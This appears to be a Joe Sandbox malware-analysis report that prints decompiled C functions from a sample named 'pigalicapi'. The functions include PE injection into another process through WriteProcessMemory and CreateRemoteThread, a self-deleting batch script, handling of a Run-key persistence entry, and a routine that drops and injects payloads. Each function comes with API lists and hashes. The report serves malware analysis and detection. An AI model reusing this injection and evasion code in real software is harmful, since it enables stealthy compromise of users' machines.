                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B2510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                            					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                            					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                            					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                            					if(_v16 != 0) {
                                                                                                                                                                                                                                                                            						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                            						if(_v32 != 0) {
                                                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                                                            							E007B7B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                            							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                            							_v36 = 0;
                                                                                                                                                                                                                                                                            							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            								E007B7B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                            								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                            								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							E007B26D0(_v16, _v32);
                                                                                                                                                                                                                                                                            							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                                            								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                            								_v28 = 0;
                                                                                                                                                                                                                                                                            								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                            						if(_v32 != 0) {
                                                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x007b2516
                                                                                                                                                                                                                                                                            0x007b2521
                                                                                                                                                                                                                                                                            0x007b26c2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2531
                                                                                                                                                                                                                                                                            0x007b253a
                                                                                                                                                                                                                                                                            0x007b254b
                                                                                                                                                                                                                                                                            0x007b2554
                                                                                                                                                                                                                                                                            0x007b256a
                                                                                                                                                                                                                                                                            0x007b2571
                                                                                                                                                                                                                                                                            0x007b2596
                                                                                                                                                                                                                                                                            0x007b259d
                                                                                                                                                                                                                                                                            0x007b25d7
                                                                                                                                                                                                                                                                            0x007b25e6
                                                                                                                                                                                                                                                                            0x007b25eb
                                                                                                                                                                                                                                                                            0x007b25ee
                                                                                                                                                                                                                                                                            0x007b2600
                                                                                                                                                                                                                                                                            0x007b263c
                                                                                                                                                                                                                                                                            0x007b2641
                                                                                                                                                                                                                                                                            0x007b25fd
                                                                                                                                                                                                                                                                            0x007b25fd
                                                                                                                                                                                                                                                                            0x007b264e
                                                                                                                                                                                                                                                                            0x007b2670
                                                                                                                                                                                                                                                                            0x007b2692
                                                                                                                                                                                                                                                                            0x007b2698
                                                                                                                                                                                                                                                                            0x007b26bf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b26bf
                                                                                                                                                                                                                                                                            0x007b267d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2683
                                                                                                                                                                                                                                                                            0x007b25b6
                                                                                                                                                                                                                                                                            0x007b25bd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b25ca
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b25d0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2573

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 007B2564
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,?,00000000,00003000,00000040), ref: 007B2590
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 007B25B0
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B25CA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9b579c9524d0fc9e75e52ad30a4817cae8bba6fdaefc9779393c85601ab1fe2c
                                                                                                                                                                                                                                                                            • Instruction ID: d348d780d408abc4d871f7ec24db7c54b4cfb8c05ef28bf102fbf5c9d63c35e3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b579c9524d0fc9e75e52ad30a4817cae8bba6fdaefc9779393c85601ab1fe2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B51F8B5E00209EFDB08DF94CC95FEEB7B5BB48304F108558E615AB291D678AA41CBA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E007B74A0() {
                                                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                                                            				CHAR* _v528;
                                                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                                                            				void* _v536;
                                                                                                                                                                                                                                                                            				void* _v540;
                                                                                                                                                                                                                                                                            				char _v1060;
                                                                                                                                                                                                                                                                            				char _v1580;
                                                                                                                                                                                                                                                                            				char _v2364;
                                                                                                                                                                                                                                                                            				long _v2368;
                                                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                                            				long _v2388;
                                                                                                                                                                                                                                                                            				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                                                            				void* _t121;
                                                                                                                                                                                                                                                                            				void* _t123;
                                                                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				E007B7D20(E007B7D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                                            				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                                            				 *0x7c4370 = 1;
                                                                                                                                                                                                                                                                            				Sleep(0x3e8);
                                                                                                                                                                                                                                                                            				if(( *0x7c4362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v2368 = 0x207;
                                                                                                                                                                                                                                                                            					if(( *0x7c435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                                            					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                                            					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                                            				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                                            				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                            				if( *0x7c436c != 0) {
                                                                                                                                                                                                                                                                            					_t86 =  *0x7c436c; // 0x224
                                                                                                                                                                                                                                                                            					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                            				_v532 = 0x80000001;
                                                                                                                                                                                                                                                                            				if(( *0x7c435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v532 = 0x80000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v536 = 0;
                                                                                                                                                                                                                                                                            				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                                            					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                                            					RegCloseKey(_v536);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(( *0x7c435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					E007B5E30(1);
                                                                                                                                                                                                                                                                            					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                                            				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                                            				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                                            				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                            				_v540 = _t71;
                                                                                                                                                                                                                                                                            				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                                            					_v2388 = 0;
                                                                                                                                                                                                                                                                            					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                                            					E007B7D20(E007B7D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                                            					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                                            					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                                            					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                                            					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                                            						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					ExitProcess(0);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t71;
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x007b74cd
                                                                                                                                                                                                                                                                            0x007b74d2
                                                                                                                                                                                                                                                                            0x007b74d5
                                                                                                                                                                                                                                                                            0x007b74e4
                                                                                                                                                                                                                                                                            0x007b74f3
                                                                                                                                                                                                                                                                            0x007b750b
                                                                                                                                                                                                                                                                            0x007b751e
                                                                                                                                                                                                                                                                            0x007b7547
                                                                                                                                                                                                                                                                            0x007b7520
                                                                                                                                                                                                                                                                            0x007b752e
                                                                                                                                                                                                                                                                            0x007b752e
                                                                                                                                                                                                                                                                            0x007b7559
                                                                                                                                                                                                                                                                            0x007b756b
                                                                                                                                                                                                                                                                            0x007b757d
                                                                                                                                                                                                                                                                            0x007b74f5
                                                                                                                                                                                                                                                                            0x007b7503
                                                                                                                                                                                                                                                                            0x007b7503
                                                                                                                                                                                                                                                                            0x007b758f
                                                                                                                                                                                                                                                                            0x007b75b4
                                                                                                                                                                                                                                                                            0x007b75ba
                                                                                                                                                                                                                                                                            0x007b75c4
                                                                                                                                                                                                                                                                            0x007b75c8
                                                                                                                                                                                                                                                                            0x007b75ce
                                                                                                                                                                                                                                                                            0x007b75ce
                                                                                                                                                                                                                                                                            0x007b75d4
                                                                                                                                                                                                                                                                            0x007b75de
                                                                                                                                                                                                                                                                            0x007b75f1
                                                                                                                                                                                                                                                                            0x007b75f3
                                                                                                                                                                                                                                                                            0x007b75f3
                                                                                                                                                                                                                                                                            0x007b75fd
                                                                                                                                                                                                                                                                            0x007b7628
                                                                                                                                                                                                                                                                            0x007b7636
                                                                                                                                                                                                                                                                            0x007b7643
                                                                                                                                                                                                                                                                            0x007b7643
                                                                                                                                                                                                                                                                            0x007b7652
                                                                                                                                                                                                                                                                            0x007b7656
                                                                                                                                                                                                                                                                            0x007b765b
                                                                                                                                                                                                                                                                            0x007b765b
                                                                                                                                                                                                                                                                            0x007b766f
                                                                                                                                                                                                                                                                            0x007b7698
                                                                                                                                                                                                                                                                            0x007b76aa
                                                                                                                                                                                                                                                                            0x007b76c6
                                                                                                                                                                                                                                                                            0x007b76cc
                                                                                                                                                                                                                                                                            0x007b76d9
                                                                                                                                                                                                                                                                            0x007b76df
                                                                                                                                                                                                                                                                            0x007b770e
                                                                                                                                                                                                                                                                            0x007b773f
                                                                                                                                                                                                                                                                            0x007b7747
                                                                                                                                                                                                                                                                            0x007b775a
                                                                                                                                                                                                                                                                            0x007b7762
                                                                                                                                                                                                                                                                            0x007b7794
                                                                                                                                                                                                                                                                            0x007b779d
                                                                                                                                                                                                                                                                            0x007b779d
                                                                                                                                                                                                                                                                            0x007b77a5
                                                                                                                                                                                                                                                                            0x007b77a5
                                                                                                                                                                                                                                                                            0x007b77ae

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 007B74E4
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 007B7503
                                                                                                                                                                                                                                                                            • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 007B752E
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,007BC650), ref: 007B7559
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,pigalicapi), ref: 007B756B
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,.exe), ref: 007B757D
                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 007B758F
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 007B75B4
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000224,00000001), ref: 007B75CE
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,007BC690,00000000,00000002,00000000), ref: 007B7620
                                                                                                                                                                                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 007B7636
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 007B7643
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 007B766F
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 007B767C
                                                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 007B7698
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,.bat), ref: 007B76AA
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 007B76C6
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000), ref: 007B76F9
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,?,00000000), ref: 007B770E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007B771B
                                                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007B778C
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 007B779D
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 007B77A5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                            • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf$software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                                            • API String ID: 3221898725-1842671280
                                                                                                                                                                                                                                                                            • Opcode ID: 0df828bd0668bf040d6eb9c341908f5d5bb82cc86d19bdcfe83ef34c8bdedc90
                                                                                                                                                                                                                                                                            • Instruction ID: 1446f463dd20da078e4dd6b952521057c1f6b7c94ee492e25aa500e6427d2140
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0df828bd0668bf040d6eb9c341908f5d5bb82cc86d19bdcfe83ef34c8bdedc90
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F67157F1A40318EBEB25DB54DC49FEA7778BB84705F44C6C8F209A5091DBB85A84CF64
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                            			E007B6DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                                            				long _v44;
                                                                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                                                                            				void* _v52;
                                                                                                                                                                                                                                                                            				void* _v56;
                                                                                                                                                                                                                                                                            				char _v324;
                                                                                                                                                                                                                                                                            				void* _v328;
                                                                                                                                                                                                                                                                            				char _v340;
                                                                                                                                                                                                                                                                            				char _v604;
                                                                                                                                                                                                                                                                            				long _v608;
                                                                                                                                                                                                                                                                            				int _v612;
                                                                                                                                                                                                                                                                            				long _v616;
                                                                                                                                                                                                                                                                            				void* _v620;
                                                                                                                                                                                                                                                                            				long _v624;
                                                                                                                                                                                                                                                                            				intOrPtr _v628;
                                                                                                                                                                                                                                                                            				void* _v632;
                                                                                                                                                                                                                                                                            				intOrPtr _t198;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                                            				void* _t223;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                                            				void* _t347;
                                                                                                                                                                                                                                                                            				void* _t349;
                                                                                                                                                                                                                                                                            				void* _t350;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a4;
                                                                                                                                                                                                                                                                            				if(_v8 == 0) {
                                                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                                            				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                            				_v32 =  *_v8;
                                                                                                                                                                                                                                                                            				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                                            				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                                            				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                                            				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                            				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                                            				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                            					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                            					E007B7D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                            					E007B9730( &_v340, 4);
                                                                                                                                                                                                                                                                            					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                                            					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                            					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                            					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                                            						_v608 = 0;
                                                                                                                                                                                                                                                                            						_v612 = 0;
                                                                                                                                                                                                                                                                            						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                            						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                            							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                                            							if(_v620 != 0) {
                                                                                                                                                                                                                                                                            								if(E007B6260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                                            									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                                            									_v616 = _v624;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CloseHandle(_v328);
                                                                                                                                                                                                                                                                            						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                                            							_t198 = E007B1E60( &_v324);
                                                                                                                                                                                                                                                                            							_t350 = _t349 + 4;
                                                                                                                                                                                                                                                                            							_v628 = _t198;
                                                                                                                                                                                                                                                                            							if(_v628 != 0) {
                                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                            									E007B73C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                            									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            									E007B2510(_v628, 0x7be290);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                                                            					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                            					goto L39;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                                                            				_v44 = 0;
                                                                                                                                                                                                                                                                            				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            					_t217 = E007B2070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                                            					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                            					_v40 = _t217;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                            					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                            					if(_v48 != 0) {
                                                                                                                                                                                                                                                                            						if(E007B6260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                                            							_t248 = E007B2070(_v48);
                                                                                                                                                                                                                                                                            							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                            							_v40 = _t248;
                                                                                                                                                                                                                                                                            							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                            								E007B7B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                                            								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_v40 == 0) {
                                                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                                                            					goto L38;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                            						E007B73C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                            						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            						_t223 = E007B97A0(0x10);
                                                                                                                                                                                                                                                                            						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                            						_v632 = _t223;
                                                                                                                                                                                                                                                                            						_v52 = _v632;
                                                                                                                                                                                                                                                                            						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                                            							if( *_v52 != 0) {
                                                                                                                                                                                                                                                                            								E007B7B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                            								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                            								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *_v52 = _v36;
                                                                                                                                                                                                                                                                            							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if( *_v52 != 0) {
                                                                                                                                                                                                                                                                            							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                                            							_v56 = CreateThread(0, 0, E007B77B0, _v52, 0, 0);
                                                                                                                                                                                                                                                                            							CloseHandle(_v56);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            						E007B2510(_v40, 0x7be290);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                                                            				}
